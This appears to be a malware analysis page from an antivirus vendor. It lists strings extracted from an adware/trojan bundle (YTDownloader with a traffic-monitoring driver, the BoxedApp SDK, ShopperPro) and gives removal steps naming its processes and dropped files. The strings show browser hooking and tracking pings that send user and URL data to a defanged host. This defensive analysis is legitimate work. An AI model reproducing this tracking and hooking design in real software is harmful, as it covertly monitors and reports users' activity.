%ws_%d.log
- Mozilla Firefox
- Windows Internet Explorer
opera
firefox
chrome
OPERA
opera.exe
safari.exe
firefox.exe
iexplore.exe
chrome.exe
explorer.exe
Google Chrome
Chrome_WidgetWin_1
Firefox
FirefoxBrowserWindow Found browser window, 0x%x
FirefoxBrowserWindow Found button window, 0x%x
IE9BrowserWindow Found browser window, 0x%x
IE9BrowserWindow Found button window, 0x%x
OperaBrowserWindow Found browser window, 0x%x
OperaBrowserWindow Found button window, 0x%x
Opera
SafariBrowserWindow Found browser window, 0x%x
SafariBrowserWindow Found button window, 0x%x
hXXp://VVV.youtube.com/watch?v=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1
YTParser url not valid %ws
SBMonitor.log
Error no signature found at %s
GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.
GetVideoUrlAndSizeFromWatchPage
YTParser could not find valid url, not downloading
hXXp://VVV.youtube.com/get_video_info?video_id=
GetVideoUrlAndSizeFromVideoInfo
Failed processing urls from watch page.
reportLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
(build %d)
Windows 2000
Windows XP
Web Edition
Windows Server 2003,
Windows XP Professional x64 Edition
Windows Home Server
Windows Storage Server 2003
Windows Server 2003 R2,
Web Server Edition
Windows Server 2008 R2
Windows 8
Windows 7
Windows Server 2008
Windows Vista
{X-hX-hX-XX-XXXXXX}
sbmntr.sys
Converter.exe
DownloadHelper.exe
HELPEREXELOCATION
YTDownloader.exe
MONITOREXELOCATION
hXXp://VVV.ytdownloader.com/feedback/
Driver - %ws: %x
\\.\SBMonitor
net.exe
Driver installed, NOT loaded: %s
Driver installed, loaded from %s
Software\Opera Software\
%programFiles%\Opera\opera.exe
Apple Application Support\WebKit2WebProcess.exe
Safari.exe
%programFiles%\Safari\Safari.exe
%programFiles%\Mozilla Firefox\firefox.exe
IEXPLORE.EXE
%programFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe
converter.exe
webm
[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).
Same as one of buttons PID %d
Same as our PID %d
[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).
___Error: Could not open device (%u).
-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http
CMonitor::BuildParams Already created similar url, %ws
CMonitor::BuildParams Button exists for similar url, %ws
youtube.com
-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http
-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s
Fwpuclnt.dll
https
Not application/octet-stream video and the size is bigger than %d, %d
Not application/octet-stream video and the size is smaller than %d
Not FLV video and the size is smaller than %d
vid2.ak.dmcdn.net
CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo Same watch page %s
HTTP_Version_String
[HttpParser::ParseLine] ___Error: The field separator was not found in the line:
VVV.google.com
Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}
YTD-icon-128x128.png
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s
hXXp://rep.ytdownloader.com/app/ping.ashx?
%s%s%s
[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d
rtmpdump.exe
[RtmpDownloader::ReadFromPipe] --- Download Ends ---
[RtmpDownloader::ReadFromPipe] --- Download Begins ---
[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d
Error : failed to run FFmpeg - %d
[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe
Failed to run update (%x).
Trying to execute an update.
CUpdater::parseUpdateXML Set report level to %ws
REPORT
CMDLINE
%sid=%d_r=%lld_err=%d
%suserid=%s&aff=%s&v=%s
hXXp://VVV.ytdownloader.com/app/update.ashx?
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
WUSER32.DLL
<>"#%{}|\^~[]`' ?&
%Program Files%\YTDownloader\YTDownloader.exe
1.0.3.9

YTDownloader.exe_3496_rwx_10000000_000E6000:

.text
`.rdata
@.data
.rsrc
@.reloc
The embedding BoxedApp into child processes: %s
GetCommandLineA preparing to intercept...done
GetCommandLineW preparing to intercept...done
The command line overriding: %s
Get old args...done
Get current dir...done
Get the extension...done
Get exe dir...done
Get exe dir...
550e832f-a497-4eb7-bb40-8cc856f6d152
BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath
, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory
, passed pBehavior doesn't support IVirtualFile
, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: IVirtualKeyHandle::CreateKey() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey
: CRegistry::SetIsolationMode() failed for the hKey =
BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
reg:NtCreateKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView
RegTree::IEnumKeyNode::GetNext(), hr =
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtOpenKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtEnumerateKey(
reg:NtDeleteKey(
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
VirtualDllWithSameImport.dll
BoxedAppSDK_RemoveExeFromAttachableChildProcListW
BoxedAppSDK_RemoveExeFromAttachableChildProcListA
BoxedAppSDK_AddExeToAttachableChildProcListW
BoxedAppSDK_AddExeToAttachableChildProcListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW
BoxedAppSDK_AddExeToAttachableChildProcExclusionListA
BoxedAppSDK_AddExeToAttachableChildProcExclusionListW
BoxedAppSDK_GetRegKeyIsolationModeA
BoxedAppSDK_GetRegKeyIsolationModeW
BoxedAppSDK_SetRegKeyIsolationModeA
BoxedAppSDK_SetRegKeyIsolationModeW
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_AddVirtualRegKeyW
BoxedAppSDK_AddVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
_CorExeMain
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegDeleteKeyW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\bin\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
System.Collections
System.Security.Permissions
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
I:\build\boxedapp_src\src\BoxedApp\bxsdk\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\boxedappsdkthunk\BoxedAppSDKThunk.pdb
.reloc
TLSSupport.dll
i:\build\boxedapp_src\src\boxedapp\bxsdk\obj\win32\release_full\tlssupport\TLSSupport.pdb
GdiPlus.dll
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s\%s
:\tempManifest.manifest
%s\winsxs\tempBxDir\virtualAsm
BoxedAppVar:OldCmdLine
BoxedAppVar:ExeFullPath
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileName
BoxedAppLog_%d.txt
%s_%.8x
#SystemDrive#\#Windows#
#SystemDrive#\#Windows#\#System32#
\Device\NETBT_TCPIP_
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
.manifest
%s_%.8x_%.8x
.boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
>.config
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are 0, so this application is not a .net application; we are exiting now
nimage_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress and .Size both are not 0, so this application seems to be a .net application; we are executing mscoree.dll!_CorExeMain now
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].Size =
image_nt_headers.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] =
image_nt_headers.OptionalHeader.AddressOfEntryPoint is NULL, let's check if this application is .net
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
sxs.dll
Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x_%.8x
.config
3, 3, 5, 12
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Softanics
BoxedAppSDK.dll


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate the malicious process(es):

    BROWSE~2.EXE:3920
    ins_geforce.exe:2072
    ShopperPro.exe:3444
    9ba9693.exe:2936
    ins_shopperpro.:540
    Vxsysrohsgnosa.exe:3856
    regsvr32.exe:3680
    ping.exe:4080
    ping.exe:3592
    ping.exe:3920
    ping.exe:3900
    ping.exe:3776
    ping.exe:2296
    ping.exe:4016
    ping.exe:2472
    ping.exe:3672
    ping.exe:3148
    ping.exe:2960
    ping.exe:4008
    ping.exe:1544
    ping.exe:1540
    ping.exe:3364
    ping.exe:3692
    ping.exe:1652
    ping.exe:548
    ping.exe:2240
    ping.exe:4044
    ping.exe:3452
    ping.exe:3600
    ping.exe:2460
    ping.exe:3912
    ping.exe:2284
    ping.exe:3136
    ping.exe:4036
    ping.exe:2972
    ping.exe:3312
    ping.exe:3884
    ping.exe:3784
    ping.exe:3460
    ping.exe:2232
    ping.exe:3372
    ping.exe:4072
    net.exe:3368
    net.exe:2624
    %original file name%.exe:1076
    %original file name%.exe:1704
    %original file name%.exe:460
    %original file name%.exe:1980
    %original file name%.exe:264
    ins_sense.exe:2100
    sc.exe:2344
    sc.exe:3936
    setup.exe:3084
    setup.exe:3256
    Smskc.exe:3904
    net1.exe:3800
    net1.exe:2732
    tcpsvcs.exe:756
    0ead95b.exe:2928

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Tasks\ShopperPro.job (2150 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
    %Program Files%\ShopperPro\config.json (488 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (2040 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (1214930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (341417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (86827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (869966 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (79085 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (14 bytes)
    %Program Files%\Sense\761d4877-9cd4-4df2-ba2a-b233e898173d-5.exe (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (11 bytes)
    %WinDir%\Tasks\761d4877-9cd4-4df2-ba2a-b233e898173d-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (9292 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (29256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (39553 bytes)
    %Program Files%\Sense\utils.exe (65500 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Program Files%\Sense\Uninstall.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (541698 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\bxsdk32.dll (2386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_geforce.exe (1497 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_sense.exe (1501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_shopperpro.exe (31368 bytes)
    %Program Files%\YTDownloader\libeay32.dll (25608 bytes)
    %WinDir%\Tasks\YTDownloader.job (942 bytes)
    %Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
    %Program Files%\YTDownloader\YTDownloader.exe (44437 bytes)
    %Program Files%\YTDownloader\DownloadAPI.dll (48358 bytes)
    %Program Files%\YTDownloader\Unelevate.exe (2752 bytes)
    %Program Files%\YTDownloader\BrowserHelper.exe (11027 bytes)
    %Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\System.dll (11 bytes)
    %Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
    %Program Files%\YTDownloader\Updater.exe (17866 bytes)
    %Program Files%\YTDownloader\download_ani.gif (9 bytes)
    %Program Files%\YTDownloader\DownloadHelper.exe (10774 bytes)
    %Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
    %Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
    %Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\sbmntr.sys (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\AccDownload.dll (9226 bytes)
    %Program Files%\Common Files\System\SysMenu.dll (15201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\nsProcess.dll (4 bytes)
    %Program Files%\YTDownloader\YTDUninstall.exe (19904 bytes)
    %Program Files%\YTDownloader\Download_completed.ico (1 bytes)
    %Program Files%\YTDownloader\convert_ani.gif (765 bytes)
    %Program Files%\YTDownloader\converter.exe (61450 bytes)
    %WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
    %Program Files%\ShopperPro\Updater.exe (25776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (7 bytes)
    %Program Files%\ShopperPro\database1_0_0.json (4 bytes)
    %Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
    %Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
    %Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
    %Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (158611 bytes)
    %Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
    %Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
    %Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
    %Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
    %Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
